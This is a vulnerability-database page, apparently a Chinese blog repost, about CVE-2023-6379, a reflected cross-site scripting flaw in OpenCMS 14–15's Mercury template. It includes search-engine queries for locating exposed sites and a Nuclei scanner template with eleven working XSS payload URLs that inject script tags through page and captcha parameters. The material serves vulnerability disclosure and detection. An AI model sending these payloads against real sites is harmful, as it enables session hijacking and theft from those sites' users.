OpenCMS 14 & 15 Cross Site Scripting Vulnerability

漏洞信息

漏洞名称: OpenCMS 14 & 15 Cross Site Scripting Vulnerability

漏洞编号:

  • CVE: CVE-2023-6379

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: OpenCMS是由Alkacon Software开发的一款开源内容管理系统,广泛应用于企业和个人网站建设中,提供内容编辑、发布和管理功能。该系统的Mercury模板在14和15版本中存在跨站脚本(XSS)漏洞。此漏洞的根源在于对用户输入的不当处理,攻击者可以通过构造特定的URL参数注入恶意脚本代码。当其他用户访问包含恶意脚本的页面时,脚本将在用户的浏览器中执行,可能导致会话劫持、敏感信息泄露等安全问题。此漏洞的利用不需要用户认证,且可以通过网络自动触发,增加了其潜在的风险。虽然漏洞的严重性被评估为中等,但由于OpenCMS的广泛应用,其影响范围可能相当广泛。

产品厂商: Alkacon

产品名称: OpenCMS

影响版本: 14 <= version <= 15

搜索语法: title=”opencms”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fcves%2F2023%2FCVE-2023-6379.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92

id: CVE-2023-6379

info:
name: OpenCMS 14 & 15 - Cross Site Scripting
author: msegoviag
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
remediation: |
Update to version OpenCMS 16
reference:
- https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
- https://nvd.nist.gov/vuln/detail/CVE-2023-6379
- https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/msegoviag/msegoviag
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-6379
cwe-id: CWE-79
epss-score: 0.18616
epss-percentile: 0.94993
cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 12
vendor: alkacon
product: opencms
shodan-query:
- title:"opencms"
- http.title:"opencms"
- cpe:"cpe:2.3:a:alkacon:opencms"
- /opencms/
fofa-query: title="opencms"
google-query: intitle:"opencms"
tags: cve2023,cve,opencms,xss,alkacon

flow: http(1) && http(2)

http:
- method: GET
path:
- "{{BaseURL}}/"

matchers:
- type: word
words:
- "OpenCms"
- "opencms"
condition: or
internal: true

- method: GET
- method: GET
path:
- "{{BaseURL}}{{paths}}"
payloads:
paths:
- '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
- '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'

stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain)</script>" />'
- 'OpenCms'
condition: and

- type: word
part: content_type
words:
- "text/html"

- type: status
status:
- 200
# digest: 4a0a00473045022100fe8b3d6ebae866108d84911725629e9352e68fef9c76a7124c42b6b41575e60c022010f46840624a17336139d45e9d718cfd74ed3af5caa970f86156b4e80df5e988:922c64590222798bb761d5b6d8e72950


OpenCMS 14 & 15 Cross Site Scripting Vulnerability
http://example.com/2025/07/21/github_2064760366/
作者
lianccc
发布于
2025年7月21日
许可协议